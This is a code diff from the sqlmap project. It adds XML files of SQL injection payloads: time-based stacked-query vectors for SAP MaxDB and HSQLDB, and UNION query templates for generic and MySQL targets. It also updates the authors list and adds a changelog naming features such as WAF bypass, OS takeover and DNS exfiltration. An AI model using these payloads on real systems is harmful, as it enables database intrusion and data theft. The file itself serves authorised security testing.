+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of stacked queries tests -->
+</root>

data/xml/payloads/union_query.xml

@@ -0,0 +1,742 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- UNION query tests -->
+    <test>
+        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+    <test>
+        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>[GENERIC_SQL_COMMENT]</comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>#</comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+    <!-- End of UNION query tests -->
+</root>

doc/AUTHORS

@@ -1,7 +1,7 @@
-Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
-<bernardo.damele@gmail.com>
-PGP Key ID: 0x05F5A30F
+Bernardo Damele Assumpcao Guimaraes (@inquisb)
+<bernardo@sqlmap.org>
 
-Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
-<miroslav.stampar@gmail.com>
-PGP Key ID: 0xB5397B1B
+Miroslav Stampar (@stamparm)
+<miroslav@sqlmap.org>
+
+You can contact both developers by writing to dev@sqlmap.org

doc/CHANGELOG.md

@@ -0,0 +1,403 @@
+# Version 1.7 (2022-01-02)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
+
+# Version 1.6 (2022-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)
+
+# Version 1.5 (2021-01-03)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
+
+# Version 1.4 (2020-01-01)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)
+
+# Version 1.3 (2019-01-05)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
+
+# Version 1.2 (2018-01-08)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
+
+# Version 1.1 (2017-04-07)
+
+* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
+* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
+
+# Version 1.0 (2016-02-27)
+
+* Implemented support for automatic decoding of page content through detected charset.
+* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
+* Major improvements to program stabilization based on user reports.
+* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
+* Fixed major bug with DNS leaking in Tor mode.
+* Added wordlist compilation made of the most popular cracking dictionaries.
+* Implemented multi-processor hash cracking routine(s).
+* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
+* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
+* Substantial code optimization and smaller memory footprint.
+* Added option `-m` for scanning multiple targets enlisted in a given textual file.
+* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
+* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
+* Added option `--host` for manually setting HTTP Host header value.
+* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
+* Added option `--skip` for skipping tests for given parameter(s).
+* Added switch `--titles` for comparing pages based only on their titles.
+* Added option `--charset` for forcing character encoding used for data retrieval.
+* Added switch `--check-tor` for checking if Tor is used properly.
+* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
+* Added option `--csv-del` for manually setting delimiting character used in CSV output.
+* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
+* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
+* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
+* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
+* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
+* Major improvements to switches `--tables` and `--columns`.
+* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
+* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
+* Added switch `-a` to enumerate all DBMS data.
+* Added option `--alert` to run host OS command(s) when SQL injection is found.
+* Added option `--answers` to set user answers to asked questions during sqlmap run.
+* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
+* Added option `--charset` to force character encoding used during data retrieval.
+* Added switch `--check-tor` to force checking of proper usage of Tor.
+* Added option `--code` to set HTTP code to match when query is evaluated to True.
+* Added option `--cookie-del` to set character to be used while splitting cookie values.
+* Added option `--crawl` to set the crawling depth for the website starting from the target URL.
+* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
+* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
+* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
+* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
+* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
+* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
+* Added switch `--disable-coloring` to disable console output coloring.
+* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
+* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
+* Added option `--eval` for setting the Python code that will be evaluated before the request.
+* Added switch `--force-ssl` to force usage of SSL/HTTPS.
+* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
+* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
+* Added switch `-hh` for showing advanced help message.
+* Added option `--host` to set the HTTP Host header value.
+* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
+* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
+* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
+* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
+* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
+* Added switch `--invalid-string` for usage of random strings while invalidating values.
+* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
+* Added option `-m` to set the textual file holding multiple targets for scanning purposes.
+* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
+* Added switch `--no-cast` for turning off payload casting mechanism.
+* Added switch `--no-escape` for turning off string escaping mechanism.
+* Added option `--not-string` for setting string to be matched when query is evaluated to False.
+* Added switch `--offline` to force work in offline mode (i.e. only use session data).
+* Added option `--output-dir` to set custom output directory path.
+* Added option `--param-del` to set character used for splitting parameter values.
+* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
+* Added option `--proxy-file` to set file holding proxy list.
+* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
+* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
+* Added option `--safe-post` to set POST data for sending to safe URL.
+* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
+* Added option `--skip` to skip testing of given parameter(s).
+* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
+* Added switch `--skip-urlencode` to skip URL encoding of payload data.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
+* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
+* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
+* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
+* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
+* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).
+* Added switch `--titles` to turn on comparison of pages based only on their titles.
+* Added option `--tor-port` to explicitly set Tor proxy port.
+* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
+* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
+* Added option `--where` to set `WHERE` condition to be used during the table dumping.
+* Added option `-X` to exclude DBMS database table column(s) from enumeration.
+* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
+* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
+
+# Version 0.9 (2011-04-10)
+
+* Rewritten SQL injection detection engine.
+* Support to directly connect to the database without passing via a SQL injection, option `-d`.
+* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
+* Implemented support for SQLite 2 and 3.
+* Implemented support for Firebird.
+* Implemented support for Microsoft Access, Sybase and SAP MaxDB.
+* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
+* Added support to tamper injection data with option `--tamper`.
+* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
+* Added support to enumerate roles on Oracle, `--roles` switch.
+* Added support for SOAP based web services requests.
+* Added support to fetch unicode data.
+* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
+* Implemented several optimization switches to speed up the exploitation of SQL injections.
+* Support to test and inject against HTTP Referer header.
+* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
+* Implemented feature to speedup the enumeration of table names.
+* Support for customizable HTTP(s) redirections.
+* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
+* Support to parse and test forms on target url, switch `--forms`.
